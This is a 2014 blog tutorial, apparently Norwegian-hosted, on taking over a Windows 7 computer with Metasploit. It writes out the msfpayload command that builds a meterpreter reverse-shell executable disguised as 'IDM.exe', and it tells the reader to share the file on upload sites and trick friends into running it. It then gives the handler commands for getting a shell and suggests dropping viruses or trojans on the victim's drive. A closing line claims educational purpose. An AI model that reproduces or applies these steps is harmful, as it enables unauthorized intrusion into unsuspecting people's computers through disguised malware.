mandag 14. april 2014

How To Hack Windows 7 Using Metasploit - Payload

First we need to create a Payload
So boot your Backtrack 5 or Kali linux and open the Terminal/Console.
     
<your payload> <LHOST=<your ip> <LPORT=<Port number > x >  < path>/< name of payload>

example:
     
msfpayload windows/meterpreter/reverse_tcp LHOST=(your ip add) LPORT=4444 x > root/desktop/IDM.exe

This should create your IDM.exe msfpayload,
Now, you need to upload your file, which in this case is IDM.exe, to any file uploading and sharing site such as MediaFire or 4shared ...
Now, you need to tell this download link of your file to your friends and let them download it.

Open a new terminal and type in msfconsole

It will take some time...

After some time it will open the MSFCONSOLE window
Now......type in  use exploit/multi/handler

Now... set the payload by typing in  set PAYLOAD windows/meterpreter/reverse_tcp

Now set Local Host by typing  set LHOST (your ip here)

Now after setting up the Payload and the Local Host its time to start the exploit.


Now you have to type in   Exploit
              
and press enter.
Wait till your friend or the victim installs the file, which is IDM.exe

Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer and then type in... Shell

this is to create a channel. If nothing happens then type in Shell again After the channel is created you can access the Windows.

Now you will see that you access to the C drive of the victims computer. Basically the drive on which the OS is installed on. So if you want that then type     Sysinfo

to get the system information about the victims computer.
You can also create a directory on the victims drive and then transfer viruses or trojans on the computer.

NOTE DO NOT TRY THIS FOR STEALING ANYTHING FROM ANYONE JUST FOR EDUCATIONAL PURPOSE



------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Kali Linux
Backtrack 5 R3
Penetesting
Hacking
Ethical Hacking
Anonymous
Windows
How To

0 kommentarer:

Legg inn en kommentar